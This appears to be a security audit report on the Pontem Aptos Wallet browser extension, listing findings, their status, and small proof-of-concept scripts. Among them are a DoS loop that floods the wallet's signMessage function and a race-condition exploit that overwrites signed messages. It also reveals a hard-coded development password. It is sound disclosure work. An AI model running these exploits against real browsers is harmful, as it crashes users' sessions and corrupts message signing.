Aptos Wallet - Pontem Network

Pontem Aptos Wallet allowed an attacker to execute malicious code using the exported wallet functions, triggering a Denial of Service on the extension and the Browser (Chrome v105.0.5195.125). An attacker could use the malicious code to call the wallet (locked and unlocked) to trigger a Denial of Service on the browser, closing the running process.

Exploit

async function sign(){
  window.pontem.signMessage('Signed message')
    .then(result => {
    console.log('Signed Message', result)
    })
    .catch(e => console.log('Error', e))
}

async function exploitDoS(){
  for(i =0;i<1000000;i++){
    sign()
  }
}

Extension Denial-of-Service

Browser Denial-of-Service

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113

The SignMessage exported function allowed an attacker to abuse the function and trigger a race condition state. The function did not control the function execution, allowing to execute multiple calls to the same function in a short period of time. This situation allowed an attacker to overwrite the content of the signed messages.

Exploit

async function exploitSign(){
for (i = 1; i <= 5; i++) {

window.pontem.signMessage(i)
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))
}

window.pontem.signMessage('Test1')
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))

await new Promise(r => setTimeout(r, 1000));

window.pontem.signMessage('Test2')
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))
}

Race condition on the signed messages

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113

The mnemonic phrase in the wallet is not encrypted in memory. As a result, an attacker who has compromised a users' machine can exfiltrate and steal users' wallet password.

This report only contains the vulnerabilities found within the Windows platform. The number of ways to exploit this on Windows were trigger than on Linux and MacOS. If the memory issues are fixed on the Windows platform, they will automatically also cater for those on Linux and MacOS.

The plain text user password is available in memory during various scenarios. Memory dumps were taken throughout the testing process. These memory dumps contained an exact replica of what was in memory while the application was open.

Making use of the strings tool on Linux, a search through the memory dump file revealed the plain text mnemonic phrase.

PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.

Several improvements in the password's encryption were made in the following GitHub Pull Request: [Wallet] APT-757. Encrypt plain text password #297

Hard-coded clear-text credentials were found in the source code. This is considered bad practice and may pose a risk for the application if a malicious user manages to access to some of them. Secrets should be securely stored and shared between the development team on a need to know basis. Additionally, these might be later re-used by someone and should they fall in the wrong hands, they could be used to access sensitive services and data.

Code Location

.env.development

HTTPS=true
BROWSER=none
REACT_APP_DEVELOPMENT_VAULT_PASSWORD=123456

SOLVED: The issue was solved in the following GitHub Commit: 6b1b114f104079ecec717fcca00ad8b485e28666 The \client team removed clear-text password from source code.

There was no password policy enforced when user was setting up the password. Weak passwords are considered to be those that are short, employ common words, system/software defaults, or any terms that could be quickly guessed by executing a brute force attack using a subset of all possible passwords, such as dictionary words, proper nouns, username-based words, or common variations on these themes and even company-related.

It was possible to configure as user's password the following values:

• 0123456789
• 000000
• aaaaaa
• abcdef

These values are considered as too weak passwords.

Weak password set up during the wallet creation

Due to lack of implementation of robust password policy (see the following vulnerabilities), it may be easy for an attacker to brute-force user accounts and compromise them.

RISK ACCEPTED: The Pontem Network team accepted the risk of the issue.

Aptos Wallet uses multiple third-party dependencies. However, some of them were affected by public-known vulnerabilities that may pose a risk to the global application security level.

Although performed tests were mainly carried out from a black-box perspective, multiple vulnerable dependencies were found during the code review phase. Halborn considered them to be reported.

Listed below in more detail which dependencies are vulnerable and the vulnerability itself.

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 08c13318d84766df8ef24e913802959b27401689): Fixed vulnerabilities deps #315

Aptos Wallet contains over 50 dependencies, some of them were not pinned to an exact version but set to compatible version (^x.x.x). This could potentially enable dependency attacks, as observed with the event-stream package with the Copay Bitcoin Wallet.

Code Location

package.json

"dependencies": {
    "@fortawesome/fontawesome-svg-core": "^6.1.1",
    "@fortawesome/free-solid-svg-icons": "^6.1.1",
    "@fortawesome/react-fontawesome": "^0.2.0",
    "@metamask/browser-passworder": "^3.0.0",
    "@metamask/jazzicon": "^2.0.0",
    "@metamask/post-message-stream": "^6.0.0",
    "@mui/icons-material": "^5.8.4",
    "@mui/material": "^5.8.6",
    "@testing-library/jest-dom": "^5.16.4",
    "@testing-library/react": "^13.3.0",
    "@testing-library/user-event": "^13.5.0",
    "aptos": "^1.3.11",
    "axios": "^0.27.2",
    "bignumber.js": "^9.0.2",
    "bip39": "^3.0.4",
    "cipher-base": "^1.0.4",
    "classnames": "^2.3.1",
    "coinstring": "^2.3.0",

SOLVED: The issue was solved in the following GitHub Commit: 2297b72090b9672614a0402751099f1d000c81ee

The transaction.ts file contains a function called setTokenName. There was a condition evaluation that would return the same value in case of True or False. This behavior did not have any dangerous functionality; however, it could be used by other functionalities, and it could conclude in an uncontrolled behavior.

Code Location

src/models/transaction.ts

const setTokenName = (tx: UserTransaction, type: string): string => {
  if (('type_arguments' in tx.payload) && tx.payload.type_arguments.length) {
    const index = type === 'remove_liquidity' ? 1 : 0;
    return prettifyTokenName(tx.payload.type_arguments[index].split('::').at(-1) as string);
  } else if (aptosTxTypes.includes(type)) {
    return 'Aptos';
  } else {
    return 'Aptos';
  }
}

SOLVED: The issue was solved in the following GitHub Commit: 24a7aacea898459803e22479acd033890e2a8828

The Aptos Wallet did not have any mechanism to verify the provided mnemonic phrase during the wallet creation process after being copied by the user. Lack of this mechanism may pose a significant risk and end up in a fund loss, if the user saves incorrectly the passphrase or forgets to write it down securely.

PoC video: Lack of mnemonic phrase security check

RISK ACCEPTED: The Pontem Network team accepted this risk. Currently, the only implemented checks were a warning message showing “Please confirm mnemonic” and a button saying “Resolve”. The user was presented with this warning after the wallet creation. In case the user had not copied the phrase during the process, the wallet would have been created, and the user would not have access to it. This verification must be implemented before creating the wallet, right after verifying the two input passwords are the same. The Pontem Network team stated that this will also be implemented in a future release.

Multiple TO-DO comments were found on the code. From the security perspective, the use of these comments does not imply a security risk. However, it could mean that the developed application did not reach an appropriate level of maturity to be in a production environment.

Code Location

src/extension/modals/TxModal/index.tsx

const handleCopy = () => {
   navigator.clipboard.writeText(tx.id)
     .then(() => setSnackVisibility(true))
     .catch(err => {
       // TODO: add error handlers
     });
 }

• src/auth/hooks/useAuth.ts
• src/data/query.ts
• src/extension/modals/SuccessTransferModal/index.tsx
• src/extension/modals/TxModal/index.tsx
• src/extension/modules/Dashboard/index.tsx
• src/extension/modules/ImportToken/ImportTokenForm/index.tsx

RISK ACCEPTED: The Pontem Network team accepted the risk of this issue.